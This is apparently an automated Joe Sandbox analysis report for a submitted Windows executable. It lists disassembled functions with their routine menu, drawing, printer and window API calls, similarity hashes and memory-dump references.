API ID: State$AsyncKeyboard$CharLayoutUnicodeUpperVirtual_memset
String ID:
API String ID: 3224171628-0
Opcode ID: cf019f8495956cbf414540afd8c58515ac2dedd7621f4d2b2285509f011e04a1
Instruction ID: 91c679476f0133d5d259545ae44604832970d193976876cac4e60b5b9c76c34e
Opcode Fuzzy Hash: cf019f8495956cbf414540afd8c58515ac2dedd7621f4d2b2285509f011e04a1
Instruction Fuzzy Hash: 7B219275A0420DABDB10AB64DC85FFD7BACFB65B40F40005AF642D61C1EFB4A984DBA1

Function 004DA380 Relevance: 12.1, APIs: 8, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 004DA392
GetMenuItemCount.USER32(?), ref: 004DA39A
GetSubMenu.USER32(?,-00000001), ref: 004DA3B7
GetMenuItemCount.USER32(00000000), ref: 004DA3C7
GetSubMenu.USER32(00000000,00000000), ref: 004DA3D8
RemoveMenu.USER32(00000000,00000000,00000400), ref: 004DA3F5
GetSubMenu.USER32(?,?), ref: 004DA40F
RemoveMenu.USER32(?,?,00000400), ref: 004DA42D

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Menu$CountItem$Remove
String ID:
API String ID: 3494307843-0
Opcode ID: 2fff77f5dd29e52b897d3c390bf014bc2aa9c2a9d65e8cc2ed1d0d20a01c67d4
Instruction ID: b6d5c103ad37182c8ee0d128ef9c77a8f31f800fdb221524a8a892247949b0fb
Opcode Fuzzy Hash: 2fff77f5dd29e52b897d3c390bf014bc2aa9c2a9d65e8cc2ed1d0d20a01c67d4
Instruction Fuzzy Hash: D1212F31900219FBCF019FA4DD54AAEBBB6FF44304F208453E901E2321D7B9AA61EF56

Function 004D93DC Relevance: 12.1, APIs: 8, Instructions: 66memorystringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32(?), ref: 004D93FB
lstrcmpW.KERNEL32(00000000,?), ref: 004D9408
OpenPrinterW.WINSPOOL.DRV(?,?,00000000), ref: 004D941A
DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 004D943A
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 004D9442
GlobalLock.KERNEL32(00000000), ref: 004D944C
DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 004D9459
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 004D9471

Part of subcall function 004E0E5F: GlobalFlags.KERNEL32(?), ref: 004E0E6E
Part of subcall function 004E0E5F: GlobalUnlock.KERNEL32(?), ref: 004E0E7F
Part of subcall function 004E0E5F: GlobalFree.KERNEL32(?), ref: 004E0E89

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 519162225c4f232b5209c029dac70f53a65aa0be07d24f76f745b9dda2992958
Instruction ID: 52bab88d7a5eae75fd8077793995c8cebf844b8ac21fd73edad838076220d541
Opcode Fuzzy Hash: 519162225c4f232b5209c029dac70f53a65aa0be07d24f76f745b9dda2992958
Instruction Fuzzy Hash: 9F118C71500608BADB266FA6CC49D7F7FEEEBC4B40B00481AF655D2222DA39DD41E764

Function 004DCD68 Relevance: 12.1, APIs: 8, Instructions: 64COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000031), ref: 004DCD7E
GetSystemMetrics.USER32(00000032), ref: 004DCD88
SetRectEmpty.USER32(006431EC), ref: 004DCD97
EnumDisplayMonitors.USER32(00000000,00000000,Function_0000CCE3,006431EC,?,?,0052D83D,?,?,?,004F72AE,?,?), ref: 004DCDA7
SystemParametersInfoW.USER32(00000030,00000000,006431EC,00000000), ref: 004DCDC2
SystemParametersInfoW.USER32(00001002,00000000,00643218,00000000), ref: 004DCDE2
SystemParametersInfoW.USER32(00001012,00000000,0064321C,00000000), ref: 004DCDFA
SystemParametersInfoW.USER32 ref: 004DCE1A

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: System$InfoParameters$Metrics$DisplayEmptyEnumMonitorsRect
String ID:
API String ID: 2614369430-0
Opcode ID: 4a9393496ebe78b8c8c02003d5bbf1a16ad7975735aa562b2dae8f22bd1e4906
Instruction ID: 992bc105b5756de1f4e363c33d79efcf2de8eab7d66cfc5d52461723709a3ebd
Opcode Fuzzy Hash: 4a9393496ebe78b8c8c02003d5bbf1a16ad7975735aa562b2dae8f22bd1e4906
Instruction Fuzzy Hash: AB111C71541740AFE7319B668C89EE3BBFCFFDAB40F00081FE59A86240D7B56445CA60

Function 004DA5AE Relevance: 12.1, APIs: 8, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

GlobalSize.KERNEL32(?), ref: 004DA5BF
GlobalAlloc.KERNEL32(00002002,00000000), ref: 004DA5D1
GlobalSize.KERNEL32(?), ref: 004DA5E2
GlobalLock.KERNEL32(?), ref: 004DA5F3
GlobalLock.KERNEL32(?), ref: 004DA5F9
GlobalSize.KERNEL32(?), ref: 004DA604
GlobalUnlock.KERNEL32(?), ref: 004DA617
GlobalUnlock.KERNEL32(?), ref: 004DA61C

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Global$Size$LockUnlock$Alloc
String ID:
API String ID: 2344174106-0
Opcode ID: 41748890a08f6017e23485a269a6bf6c22dd4973cc547c410061200f3ff3a0be
Instruction ID: 802cac69d05a652bf0591b341820e488a4d0f3095a7b8a0f743b824c1df68e66
Opcode Fuzzy Hash: 41748890a08f6017e23485a269a6bf6c22dd4973cc547c410061200f3ff3a0be
Instruction Fuzzy Hash: AF01BC71900218BFDB116F669C94C6FBF6CEF542A07008427FC0893321DA78DE20EAA4

Function 004E51FD Relevance: 12.0, APIs: 8, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 004E520C
GetSystemMetrics.USER32(0000000C), ref: 004E5213
GetSystemMetrics.USER32(00000002), ref: 004E521A
GetSystemMetrics.USER32(00000003), ref: 004E5224
GetDC.USER32(00000000), ref: 004E522E
GetDeviceCaps.GDI32(00000000,00000058), ref: 004E523F
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004E5247
ReleaseDC.USER32(00000000,00000000), ref: 004E524F

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: 282ed821d4fb00c8cb9d7508ba98035c1745344bbaa434681a9a52704fd15419
Instruction ID: d62fec9cf3c5e5ef91d675694bc75c92300b531efb27b4c6f321b92f55200cd9
Opcode Fuzzy Hash: 282ed821d4fb00c8cb9d7508ba98035c1745344bbaa434681a9a52704fd15419
Instruction Fuzzy Hash: DEF06DB1E40724BAEB106B729C89F367F68FB50761F104416E604CB280CBB99815CFC0

Function 005B4D84 Relevance: 12.0, APIs: 8, Instructions: 36windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005B4D8B
DestroyIcon.USER32(?,00000004,0054EBC6,00000004,0054EE45,?,?,?), ref: 005B4DAE
DestroyIcon.USER32(?,?,?), ref: 005B4DB6
DestroyIcon.USER32(?,?,?), ref: 005B4DBE
DestroyIcon.USER32(?,?,?), ref: 005B4DC6
DestroyIcon.USER32(?,?,?), ref: 005B4DCE
DestroyIcon.USER32(?,?,?), ref: 005B4DD6

Part of subcall function 004DDC8F: __EH_prolog3_catch_GS.LIBCMT ref: 004DDC99

Part of subcall function 004E0389: DeleteDC.GDI32(00000000), ref: 004E039B

~_Task_impl.LIBCPMT ref: 005B4E10

Part of subcall function 0053F7DC: __EH_prolog3.LIBCMT ref: 0053F7E3

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: DestroyIcon$H_prolog3$DeleteH_prolog3_catch_Task_impl
String ID:
API String ID: 3851967330-0
Opcode ID: 3d68d22e7bc645af2768c3bd886c04fc0af56efc581363219e7a56ddfc23c569
Instruction ID: 30d28ad108f96994ee02c3ff14126ff7630cf4d20ac4a55d722d9d57eb159a5d
Opcode Fuzzy Hash: 3d68d22e7bc645af2768c3bd886c04fc0af56efc581363219e7a56ddfc23c569
Instruction Fuzzy Hash: 5C015A34401784DFDB21BF71CD05BAEBEA2FF80304F11455DE5AA172A1CBB52A45DB02

Function 0055A81F Relevance: 10.8, APIs: 7, Instructions: 325windowstringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0055A829
GetMenuItemCount.USER32(0000000D), ref: 0055A872
GetMenuItemID.USER32(0000000D,?), ref: 0055A895

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

Part of subcall function 0054ABE8: __EH_prolog3.LIBCMT ref: 0054ABEF

Part of subcall function 004DCC4D: __EH_prolog3.LIBCMT ref: 004DCC54

lstrlenW.KERNEL32(00000000,?), ref: 0055A9B7
CharUpperBuffW.USER32(00000002,00000001), ref: 0055A9CC
lstrlenW.KERNEL32(00000000), ref: 0055A9D4
GetSubMenu.USER32(00000000,?), ref: 0055AB06

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3Menu$Itemlstrlen$BuffCharCountException@8H_prolog3_ThrowUpper
String ID:
API String ID: 1336055891-0
Opcode ID: 879cb5b4cc1af74aec67c9a7f54b6a019905de619809e19be810238da87a0d98
Instruction ID: 93c37e68905a4b8ada5f14dabd52137e3cda9ac6262bd6f84ef080580dacbf87
Opcode Fuzzy Hash: 879cb5b4cc1af74aec67c9a7f54b6a019905de619809e19be810238da87a0d98
Instruction Fuzzy Hash: DBD17830904229ABCF25EB64CC69BEDBB74BF05325F1042DBE519A62D1DB345E88CF52

Function 005550AD Relevance: 10.8, APIs: 7, Instructions: 307COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 005550E5
CopyRect.USER32(?,?), ref: 005550F7
GetCursorPos.USER32(?), ref: 00555165
GetWindowRect.USER32(?,?), ref: 00555181
IsRectEmpty.USER32(?), ref: 00555282
CopyRect.USER32(?,?), ref: 005552BB
CopyRect.USER32(?,?), ref: 005552F8

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Copy$Empty$CursorWindow
String ID:
API String ID: 3097416131-0
Opcode ID: 9cd323fff117954cded28d4dbc2827463788751bdd7d7b0cf3a35a29c55e78be
Instruction ID: 9f0fb5987ec422fe019c2e737603ff5d3d45de8e392b1fa82d2c662e13865478
Opcode Fuzzy Hash: 9cd323fff117954cded28d4dbc2827463788751bdd7d7b0cf3a35a29c55e78be
Instruction Fuzzy Hash: 7FC15D31A00609EFCF15DFA4C8A9AEEBBB5FF49305F10442AE815A7251EB71AD09CF50

Function 0050EEE8 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 258keyboardCOMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(006073F0), ref: 0050EF14
GetKeyState.USER32(00000011), ref: 0050EF1C
IsRectEmpty.USER32(?), ref: 0050EF79
GetWindowRect.USER32(?,006073F0), ref: 0050F0F6

Strings

Dc, xrefs: 0050F0B4
`c, xrefs: 0050EF39

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Empty$StateWindow
String ID: Dc$`c
API String ID: 2684165152-1800285958
Opcode ID: 24c13eaee5c79ca59899134e6616eb36850e397c7f406d6ccc2e1d8cbd78862d
Instruction ID: c0b2b349f37d2cc21af52ee5f3519eb9432c8d368688f194b6e3bf233b3399ec
Opcode Fuzzy Hash: 24c13eaee5c79ca59899134e6616eb36850e397c7f406d6ccc2e1d8cbd78862d
Instruction Fuzzy Hash: 3B916031A00205DFDF15DFA4DC45BAEBBB6FF88310F14816AF905A7695CB35A940CBA4

Function 00554E09 Relevance: 10.8, APIs: 7, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 0054C96C: GetParent.USER32(?), ref: 0054C986

OffsetRect.USER32(?,?,?), ref: 00554E4D
GetCursorPos.USER32(?), ref: 00554E5D

Part of subcall function 00551251: SetRectEmpty.USER32(?), ref: 0055125E
Part of subcall function 00551251: GetWindowRect.USER32(?,?), ref: 0055126F

Part of subcall function 0054C8BB: GetParent.USER32(00000000), ref: 0054C8C6
Part of subcall function 0054C8BB: OffsetRect.USER32(?,00000000,?), ref: 0054C8FE

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$OffsetParent$CursorEmptyWindow
String ID:
API String ID: 633258892-0
Opcode ID: 60a0efa55e3dc50babe2638a5e1d82729e964d3c539fe077c03cb933ac589d5e
Instruction ID: 84594908cfe84ac3bc377182f1bb68d1aad58f57dee52cab33a1843e318f0b11
Opcode Fuzzy Hash: 60a0efa55e3dc50babe2638a5e1d82729e964d3c539fe077c03cb933ac589d5e
Instruction Fuzzy Hash: B9A1F971A0010AAFCF14DFA8D999AEEBBB6FF48305F14446AF905E7290DB319945CF60

Function 00560EDE Relevance: 10.7, APIs: 7, Instructions: 242COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00560EE5
CreateCompatibleDC.GDI32(00000002), ref: 00560F42

Part of subcall function 00543605: FillRect.USER32(?,00000020), ref: 00543619

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: CompatibleCreateFillH_prolog3Rect
String ID:
API String ID: 2215992850-0
Opcode ID: 9aace8f7f67e7fd54165d52f5493faef96c5cd99cb08e0e179ab8aea55c25e60
Instruction ID: 78723b2d3a1637112a14180a853a9de33254e0a22731bef9f15218b5cb52b5fd
Opcode Fuzzy Hash: 9aace8f7f67e7fd54165d52f5493faef96c5cd99cb08e0e179ab8aea55c25e60
Instruction Fuzzy Hash: 3F91A830A0061A9BCB14DFA9CD89ABEBFB5FF44300F04422AF961E7291DB74D954DB64

Function 004D37B0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

_fgetc.LIBCMT ref: 004D383F
_fgetc.LIBCMT ref: 004D386C
_memcpy_s.LIBCMT ref: 004D3967

Strings

string too long, xrefs: 004D39C7

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: _fgetc$_memcpy_s
String ID: string too long
API String ID: 160369518-2556327735
Opcode ID: 16767058a65850e3bb4534122e4c6bfc44f8fccab5bd7bd3cbac2a44fc652e29
Instruction ID: 55574f2d1c19c16605b064eeb3786c5ed4abafd5b4b95313ef75d662a93b3e38
Opcode Fuzzy Hash: 16767058a65850e3bb4534122e4c6bfc44f8fccab5bd7bd3cbac2a44fc652e29
Instruction Fuzzy Hash: B091A071E002199FCB14DFA8C8A09EEB7B1FF49311F50855BE42277780D779AA04CB95

Function 0052701A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 216windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00527071
IsWindow.USER32(?), ref: 00527238
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00527264
GetParent.USER32(?), ref: 0052726D
RedrawWindow.USER32(?,00000000,00000000,00000185,00000000), ref: 00527283

Strings

83`, xrefs: 0052713E

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: MessageSendWindow$ParentRedraw
String ID: 83`
API String ID: 3493001960-1826646354
Opcode ID: cd7662c3f1b05e0ce6dae46bb43381400dbe1ba3550591d1bd44da7a10b0d794
Instruction ID: 72e517c4228cf61a35d0a071b99edb7c8d5d720ddfd31a7f33ab3e471ef846ae
Opcode Fuzzy Hash: cd7662c3f1b05e0ce6dae46bb43381400dbe1ba3550591d1bd44da7a10b0d794
Instruction Fuzzy Hash: A5718B34B04226EFDB24DF65D888AAE7BE5FF09304F14457AE54ADB2A1DB319D40CB90

Function 0053C458 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 207COMMON

Download Yara Rule

APIs

LockWindowUpdate.USER32(?), ref: 0053C47E
IsWindow.USER32(?), ref: 0053C4A4
GetWindowRect.USER32(?,?), ref: 0053C4FF
CopyRect.USER32(?,?), ref: 0053C62E
LockWindowUpdate.USER32(00000000,?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 0053C653

Strings

c, xrefs: 0053C510

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$LockRectUpdate$Copy
String ID: c
API String ID: 2992910783-2927717585
Opcode ID: 3c6af67bb63dc9efbde7581eddda23b5f198f0f511fa0ee8fd52d5c7cc3023e2
Instruction ID: e6b3d80f4539b06e0ce813c3cbbc6a82170180b273dde5e2848132e15a30a81c
Opcode Fuzzy Hash: 3c6af67bb63dc9efbde7581eddda23b5f198f0f511fa0ee8fd52d5c7cc3023e2
Instruction Fuzzy Hash: 1A71E574A00218AFCB15DFA9C898DAEBBF9FF89700F14446AF846E7251DB346941CF60

Function 005B3646 Relevance: 10.7, APIs: 7, Instructions: 188COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 005B364D
GetClientRect.USER32(00000000,?), ref: 005B3686
GetSystemMetrics.USER32(00000002), ref: 005B3698
